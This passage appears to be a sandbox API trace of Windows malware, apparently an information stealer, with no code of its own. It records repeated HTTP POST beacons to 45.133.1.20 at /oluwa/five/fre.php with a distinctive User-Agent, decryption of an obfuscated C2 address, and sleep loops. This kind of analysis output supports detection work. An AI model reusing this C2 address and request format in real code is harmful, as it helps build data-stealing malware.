ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0276.803] GetProcessHeap () returned 0x6a0000 [0276.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0276.803] GetProcessHeap () returned 0x6a0000 [0276.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0276.804] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0276.805] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0276.805] GetProcessHeap () returned 0x6a0000 [0276.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0276.805] GetProcessHeap () returned 0x6a0000 [0276.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0276.805] GetProcessHeap () returned 0x6a0000 [0276.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0276.805] GetProcessHeap () returned 0x6a0000 [0276.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0276.806] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0276.807] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0276.807] GetProcessHeap () returned 0x6a0000 [0276.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0276.807] GetProcessHeap () returned 0x6a0000 [0276.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0276.808] send (s=0x9ec, buf=0x6bd460*, len=242, flags=0) returned 242 [0276.809] send (s=0x9ec, buf=0x6bb998*, len=159, flags=0) returned 159 [0276.809] GetProcessHeap () returned 0x6a0000 [0276.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0276.809] recv (in: s=0x9ec, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0276.913] GetProcessHeap () returned 0x6a0000 [0276.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0276.926] GetProcessHeap () returned 0x6a0000 [0276.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0276.929] GetProcessHeap () returned 0x6a0000 [0276.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0276.929] GetProcessHeap () returned 0x6a0000 [0276.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0276.930] closesocket (s=0x9ec) returned 0 [0276.932] GetProcessHeap () returned 0x6a0000 [0276.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0276.932] GetProcessHeap () returned 0x6a0000 [0276.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.933] GetProcessHeap () returned 0x6a0000 [0276.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0276.933] GetProcessHeap () returned 0x6a0000 [0276.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0276.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1780) returned 0x9ec [0276.937] Sleep (dwMilliseconds=0xea60) [0276.939] GetProcessHeap () returned 0x6a0000 [0276.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0276.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.941] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.955] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0276.966] GetProcessHeap () returned 0x6a0000 [0276.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0276.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.967] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0276.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.969] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.983] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.983] GetProcessHeap () returned 0x6a0000 [0276.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0276.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.984] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0276.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.986] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0276.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.987] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0276.987] GetProcessHeap () returned 0x6a0000 [0276.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.992] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.993] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.994] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.995] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.996] GetProcessHeap () returned 0x6a0000 [0276.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0276.996] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.996] GetProcessHeap () returned 0x6a0000 [0276.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0276.997] GetProcessHeap () returned 0x6a0000 [0276.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.997] GetProcessHeap () returned 0x6a0000 [0276.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0276.997] GetProcessHeap () returned 0x6a0000 [0276.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0276.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.999] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.009] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0277.019] GetProcessHeap () returned 0x6a0000 [0277.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0277.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.021] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0277.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.025] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.026] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.026] GetProcessHeap () returned 0x6a0000 [0277.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0277.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.028] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0277.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.030] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0277.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.031] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0277.031] GetProcessHeap () returned 0x6a0000 [0277.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.033] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0277.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.037] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0277.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.038] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0277.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.039] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0277.039] GetProcessHeap () returned 0x6a0000 [0277.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0277.039] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0277.039] GetProcessHeap () returned 0x6a0000 [0277.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0277.040] socket (af=2, type=1, protocol=6) returned 0x9f0 [0277.040] connect (s=0x9f0, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0277.070] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0277.071] GetProcessHeap () returned 0x6a0000 [0277.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0277.071] GetProcessHeap () returned 0x6a0000 [0277.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0277.072] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.073] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.073] GetProcessHeap () returned 0x6a0000 [0277.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0277.073] GetProcessHeap () returned 0x6a0000 [0277.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0277.074] GetProcessHeap () returned 0x6a0000 [0277.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0277.074] GetProcessHeap () returned 0x6a0000 [0277.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0277.075] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.075] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.075] GetProcessHeap () returned 0x6a0000 [0277.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0277.075] GetProcessHeap () returned 0x6a0000 [0277.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0277.076] send (s=0x9f0, buf=0x6bd460*, len=242, flags=0) returned 242 [0277.078] send (s=0x9f0, buf=0x6bb998*, len=159, flags=0) returned 159 [0277.079] GetProcessHeap () returned 0x6a0000 [0277.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0277.079] recv (in: s=0x9f0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0277.147] GetProcessHeap () returned 0x6a0000 [0277.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0277.148] GetProcessHeap () returned 0x6a0000 [0277.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0277.148] GetProcessHeap () returned 0x6a0000 [0277.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0277.149] GetProcessHeap () returned 0x6a0000 [0277.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0277.149] closesocket (s=0x9f0) returned 0 [0277.150] GetProcessHeap () returned 0x6a0000 [0277.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0277.150] GetProcessHeap () returned 0x6a0000 [0277.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0277.150] GetProcessHeap () returned 0x6a0000 [0277.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0277.151] GetProcessHeap () returned 0x6a0000 [0277.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0277.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1784) returned 0x9f0 [0277.153] Sleep (dwMilliseconds=0xea60) [0277.156] GetProcessHeap () returned 0x6a0000 [0277.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0277.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0277.215] GetProcessHeap () returned 0x6a0000 [0277.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0277.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.218] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0277.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.220] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.221] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.221] GetProcessHeap () returned 0x6a0000 [0277.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0277.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.223] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0277.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.224] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0277.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.225] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0277.225] GetProcessHeap () returned 0x6a0000 [0277.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.227] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0277.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.228] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0277.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.229] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0277.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.234] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0277.234] GetProcessHeap () returned 0x6a0000 [0277.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0277.234] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0277.234] GetProcessHeap () returned 0x6a0000 [0277.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0277.235] GetProcessHeap () returned 0x6a0000 [0277.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0277.235] GetProcessHeap () returned 0x6a0000 [0277.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0277.235] GetProcessHeap () returned 0x6a0000 [0277.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0277.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.248] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0277.261] GetProcessHeap () returned 0x6a0000 [0277.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0277.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.263] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0277.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.264] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.265] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.265] GetProcessHeap () returned 0x6a0000 [0277.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0277.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.273] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0277.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.274] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0277.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0277.278] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0277.278] GetProcessHeap () returned 0x6a0000 [0277.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0277.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.279] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0277.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.281] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0277.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.282] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0277.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.284] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0277.284] GetProcessHeap () returned 0x6a0000 [0277.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0277.284] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0277.284] GetProcessHeap () returned 0x6a0000 [0277.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0277.284] socket (af=2, type=1, protocol=6) returned 0x9f4 [0277.284] connect (s=0x9f4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0277.314] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0277.314] GetProcessHeap () returned 0x6a0000 [0277.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0277.314] GetProcessHeap () returned 0x6a0000 [0277.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0277.315] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0277.316] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 